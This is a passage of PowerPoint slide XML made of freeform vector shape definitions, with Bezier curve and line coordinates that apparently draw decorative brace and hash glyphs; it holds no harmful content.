                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 42 h 240"/>
                  <a:gd name="T30" fmla="*/ 41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1" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="220"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="204"/>
                      <a:pt x="21" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                      <a:pt x="42" y="119"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="26"/>
                      <a:pt x="14" y="17"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                      <a:pt x="41" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41"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Freeform 397"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6092"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 name="Freeform 398"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6240"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7"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Freeform 399"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="643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Freeform 400"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6634"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401"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6781"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Freeform 402"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6978"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403"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="712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Freeform 404"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7325"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405"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7473" y="374"/>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1" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="203"/>
                      <a:pt x="43" y="201"/>
                      <a:pt x="35" y="196"/>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406"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7671"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Freeform 407"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3461" y="36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8"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>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2"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9"/>
                      <a:pt x="154" y="151"/>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1" y="189"/>
                      <a:pt x="121" y="192"/>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4"/>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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>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2"/>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8"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="182"/>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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116"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8"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>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8"/>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8" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>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7" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>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3"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79"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2" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72"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408"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="424"/>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409"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="42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Freeform 410"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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411"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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412"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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413"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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414"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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415"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 416"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="1108"/>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2"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="0"/>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417"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="1108"/>
                <a:ext cx="77"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7 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 241"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 156 h 241"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 121 h 241"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 241"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 45 h 241"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 18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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="212"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="22" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                      <a:pt x="22" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="136"/>
                      <a:pt x="29" y="125"/>
                      <a:pt x="43" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                      <a:pt x="43" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="116"/>
                      <a:pt x="22" y="104"/>
                      <a:pt x="22" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                      <a:pt x="22" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="15"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="102"/>
                      <a:pt x="49" y="112"/>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418"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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420"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3395"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21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3590"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22"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3788"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23"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3938"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24"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4085"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5"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4284"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6"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4433" y="1103"/>
              <a:ext cx="82"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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4581"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8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4779"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29"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4926"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30"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5125"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1"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5261" y="1108"/>
              <a:ext cx="188" cy="218"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 188 w 188"/>
                <a:gd name="T1" fmla="*/ 67 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 188"/>
                <a:gd name="T3" fmla="*/ 85 h 218"/>
                <a:gd name="T4" fmla="*/ 142 w 188"/>
                <a:gd name="T5" fmla="*/ 85 h 218"/>
                <a:gd name="T6" fmla="*/ 131 w 188"/>
                <a:gd name="T7" fmla="*/ 135 h 218"/>
                <a:gd name="T8" fmla="*/ 177 w 188"/>
                <a:gd name="T9" fmla="*/ 135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5 h 218"/>
                <a:gd name="T32" fmla="*/ 48 w 188"/>
                <a:gd name="T33" fmla="*/ 135 h 218"/>
                <a:gd name="T34" fmla="*/ 58 w 188"/>
                <a:gd name="T35" fmla="*/ 85 h 218"/>
                <a:gd name="T36" fmla="*/ 11 w 188"/>
                <a:gd name="T37" fmla="*/ 85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5 h 218"/>
                <a:gd name="T60" fmla="*/ 78 w 188"/>
                <a:gd name="T61" fmla="*/ 85 h 218"/>
                <a:gd name="T62" fmla="*/ 67 w 188"/>
                <a:gd name="T63" fmla="*/ 135 h 218"/>
                <a:gd name="T64" fmla="*/ 110 w 188"/>
                <a:gd name="T65" fmla="*/ 135 h 218"/>
                <a:gd name="T66" fmla="*/ 121 w 188"/>
                <a:gd name="T67" fmla="*/ 8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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="67"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="121" y="85"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110"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32"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5478"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33"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5904" y="1103"/>
              <a:ext cx="82"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4"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6051"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35"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="62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36"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="639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7"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6547"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38"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6744"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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6893"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0"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7043"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1"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7192"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2"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7340"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443"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="753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444"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7686"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445"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5672" y="1096"/>
              <a:ext cx="218" cy="255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 175 w 179"/>
                <a:gd name="T1" fmla="*/ 173 h 209"/>
                <a:gd name="T2" fmla="*/ 134 w 179"/>
                <a:gd name="T3" fmla="*/ 208 h 209"/>
                <a:gd name="T4" fmla="*/ 81 w 179"/>
                <a:gd name="T5" fmla="*/ 198 h 209"/>
                <a:gd name="T6" fmla="*/ 32 w 179"/>
                <a:gd name="T7" fmla="*/ 201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59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3 h 209"/>
                <a:gd name="T40" fmla="*/ 161 w 179"/>
                <a:gd name="T41" fmla="*/ 152 h 209"/>
                <a:gd name="T42" fmla="*/ 88 w 179"/>
                <a:gd name="T43" fmla="*/ 71 h 209"/>
                <a:gd name="T44" fmla="*/ 102 w 179"/>
                <a:gd name="T45" fmla="*/ 67 h 209"/>
                <a:gd name="T46" fmla="*/ 73 w 179"/>
                <a:gd name="T47" fmla="*/ 79 h 209"/>
                <a:gd name="T48" fmla="*/ 63 w 179"/>
                <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                <a:gd name="T68" fmla="*/ 119 w 179"/>
                <a:gd name="T69" fmla="*/ 171 h 209"/>
                <a:gd name="T70" fmla="*/ 126 w 179"/>
                <a:gd name="T71" fmla="*/ 145 h 209"/>
                <a:gd name="T72" fmla="*/ 126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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="176"/>
                    <a:pt x="179" y="179"/>
                    <a:pt x="176" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="185"/>
                    <a:pt x="170" y="187"/>
                    <a:pt x="166" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="193"/>
